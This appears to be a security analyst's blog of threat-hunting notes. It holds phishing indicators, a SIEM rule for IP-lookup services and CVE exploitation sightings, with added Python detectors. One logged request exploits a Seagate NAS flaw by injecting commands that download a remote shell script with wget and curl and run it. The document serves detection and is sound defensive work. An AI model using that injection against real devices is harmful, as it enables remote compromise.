proxy #threathunt idea:
where urlpath = '/next.php' and method = 'POST' and referrer is null

cred #phishing 9/10/21 SharePoint theme
sbj: notification 1 new FAX
from: mout.kundenserver[.]de 212.227.126.134
HTML attachment posts stolen creds to gms4372.nelrg[.]com/gfkn/next.php
Friday, September 10, 2021
Threat Hunt - Proxy Phishing from HTML attachment
Threat Hunt - Proxy C2 IP with PHP
potential proxy #threathunt idea
Siem Rule - IP Lookup Service
Malware IP lookup service #siem detection rule idea
dns request in:
- canireachthe.net
- ipv4.icanhazip.com
- ip.anysrc.net
- edns.ip-api.com
- wtfismyip.com
- checkip.dyndns.org
- api.2ip.ua
- icanhazip.com
- api.ipify.org
- ip-api.com
- checkip.amazonaws.com
- ipecho.net
- ipinfo.io
- ipv4bot.whatismyipaddress.com
- freegeoip.app
imagename not in:
- brave.exe
- iexplore.exe
- opera.exe
- firefox.exe
- msedge.exe
- chrome.exe
- vivaldi.exe
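The rule idea above, worked through as an added example (this is not code from the original post): it evaluates constructed DNS-request events against the lookup-service list and the browser exclusion list. The event field names (host, image path, queried name) and the sample events are assumptions; matching is generalised slightly so that a subdomain of a listed service (for example a hypothetical v4.ipinfo.io) also hits, while a look-alike such as ipinfo.io.example.com does not.

```python
# Added example, not from the original post: evaluate the "IP lookup service" SIEM rule
# idea over constructed DNS-request events. Field names and sample events are assumptions.
from dataclasses import dataclass

# Hostnames from the rule. A query matches if it equals one of these or is a subdomain of one.
IP_LOOKUP_SERVICES = {
    "canireachthe.net", "ipv4.icanhazip.com", "ip.anysrc.net", "edns.ip-api.com",
    "wtfismyip.com", "checkip.dyndns.org", "api.2ip.ua", "icanhazip.com",
    "api.ipify.org", "ip-api.com", "checkip.amazonaws.com", "ipecho.net",
    "ipinfo.io", "ipv4bot.whatismyipaddress.com", "freegeoip.app",
}

# Browser processes excluded by the rule: a user browsing to one of these sites is expected.
BROWSER_IMAGES = {
    "brave.exe", "iexplore.exe", "opera.exe", "firefox.exe",
    "msedge.exe", "chrome.exe", "vivaldi.exe",
}


@dataclass(frozen=True)
class DnsEvent:
    host: str    # endpoint that made the request (assumed field)
    image: str   # full path of the requesting process, Sysmon event 22 style (assumed field)
    query: str   # queried name (assumed field)


def _normalise(name: str) -> str:
    # Lower-case and drop a trailing root dot so "IPINFO.IO." matches "ipinfo.io"
    return name.strip().lower().rstrip(".")


def queries_lookup_service(query: str) -> bool:
    """True if the queried name is a listed service or a subdomain of one."""
    labels = _normalise(query).split(".")
    # Walk up the name: a.b.c -> a.b.c, b.c (never the bare TLD)
    for i in range(len(labels) - 1):
        if ".".join(labels[i:]) in IP_LOOKUP_SERVICES:
            return True
    return False


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX process path, lower-cased, as the rule's imagename."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate_rule(events):
    """Return the events that satisfy the rule: lookup-service query from a non-browser process."""
    return [e for e in events
            if queries_lookup_service(e.query) and image_name(e.image) not in BROWSER_IMAGES]


# Constructed sample telemetry (not real events): two should alert, three should not.
SAMPLE_EVENTS = [
    DnsEvent("WS01", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "api.ipify.org"),
    DnsEvent("WS01", r"C:\Users\alice\AppData\Roaming\update.exe", "api.ipify.org"),
    DnsEvent("WS02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "IPINFO.IO."),
    DnsEvent("WS02", r"C:\Windows\System32\svchost.exe", "www.microsoft.com"),
    DnsEvent("WS03", r"C:\Program Files\Mozilla Firefox\firefox.exe", "edns.ip-api.com"),
]

if __name__ == "__main__":
    for hit in evaluate_rule(SAMPLE_EVENTS):
        print(f"ALERT {hit.host}: {image_name(hit.image)} resolved {hit.query}")
```

Running it prints alerts for update.exe and powershell.exe only; the browser-originated queries and the unrelated svchost.exe query are dropped by the two halves of the rule.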
Wednesday, August 18, 2021
CVE-2014-3206 Seagate NAS RCE
Seen August 7th, 2021: exploitation attempts from 155.4.223[.]53
GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolol.sh
https://www.exploit-db.com/exploits/33159
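A detection angle on the request above, as an added example that is not part of the original post: scan web-server access logs for query-string values that carry a shell command chain (metacharacters such as `;` plus download tooling or an embedded URL), which is the shape of the request logged above. The common-log-format layout, the timestamps and the two benign lines are constructed; the request line is the one from the post.

```python
# Added example, not from the original post: flag access-log requests whose query-string
# values look like injected shell command chains. Log format and benign lines are constructed.
import re
from urllib.parse import urlsplit, unquote_plus

# A finding requires a shell chaining/substitution metacharacter in a parameter value
SHELL_CHAIN = re.compile(r"(;|\|\||&&|\||`|\$\()")
# Extra indicators that raise confidence once a metacharacter is present
FETCH_AND_RUN = re.compile(r"\b(wget|curl|sh|bash|chmod)\b", re.IGNORECASE)
EMBEDDED_URL = re.compile(r"https?://", re.IGNORECASE)

# Common log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_query(query: str):
    """Split a raw query string into decoded (name, value) pairs without depending on parse_qsl
    separator behaviour, which changed between Python versions."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, raw = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(raw)))
    return pairs


def suspicious_params(target: str):
    """Return (param, decoded value, indicators) for values containing a shell command chain."""
    findings = []
    for name, value in split_query(urlsplit(target).query):
        if not SHELL_CHAIN.search(value):
            continue
        indicators = ["shell metacharacter"]
        if FETCH_AND_RUN.search(value):
            indicators.append("fetch-and-run tool name")
        if EMBEDDED_URL.search(value):
            indicators.append("embedded URL")
        findings.append((name, value, indicators))
    return findings


def scan_log(text: str):
    """Scan access-log text and return one alert dict per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value, indicators in suspicious_params(rec["target"]):
            alerts.append({
                "src": rec["ip"], "ts": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "param": name, "value": value, "indicators": indicators,
            })
    return alerts


# Constructed sample log: line 1 carries the request from the post, lines 2-3 are benign.
SAMPLE_LOG = """\
155.4.223.53 - - [07/Aug/2021:10:15:02 +0000] "GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolol.sh HTTP/1.1" 200 512
10.0.0.12 - - [07/Aug/2021:10:16:40 +0000] "GET /backupmgt/localJob.php?session=3f2a9c HTTP/1.1" 200 2048
10.0.0.15 - - [07/Aug/2021:10:17:01 +0000] "GET /search.php?q=wget+mirrors+list HTTP/1.1" 200 880
"""

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['src']} {a['path']} param={a['param']} {a['indicators']}")
```

The third sample line mentions `wget` in a search query but has no chaining metacharacter, so it is not reported; requiring the metacharacter first and treating tool names and URLs as supporting indicators keeps ordinary search traffic out of the alert queue.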
CVE-2020-7796 SSRF Zimbra
Sample exploit attempt of "CVE-2020-7796" -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7796…
"...Potential for SSRF if WebEx zimlet installed and zimlet JSP enabled..." -> https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7…
Vuln Details -> https://github.com/Zimbra/zm-zimlets/commit/def0d6bbcd368eaa0c177935ba4c22e63039d94c…
Seen this week from 103.138.125[.]199 #CVE20207796
Monday, June 7, 2021
Python pip Upgrade or Install Fails: SSL: CERTIFICATE_VERIFY_FAILED behind Proxy
If you're behind a proxy and get errors like these when installing or upgrading Python packages or pip itself:
python -m pip install --upgrade pip
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1123)'))': /simple/pip/
Then try these extra parameters to make pip trust the Python package hosts (they skip certificate verification for those hosts, so only do this if you trust the proxy):
python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org --upgrade pip
Collecting pip
Downloading pip-21.1.2-py3-none-any.whl (1.5 MB)
|████████████████████████████████| 1.5 MB 1.3 MB/s
Friday, June 4, 2021
Windows Event TimeGenerated / TimeWritten Date Conversion in PowerShell
In Windows event logs, if you see
TimeGenerated=1622614277 TimeWritten=1622614277
and want the actual time, use this .NET/PowerShell one-liner, which treats the value as seconds since the Unix epoch and converts it to local time:
[timezone]::CurrentTimeZone.ToLocalTime(([datetime]'1/1/1970').AddSeconds("1622614277"))
Wednesday, June 2, 2021 1:11:17 AM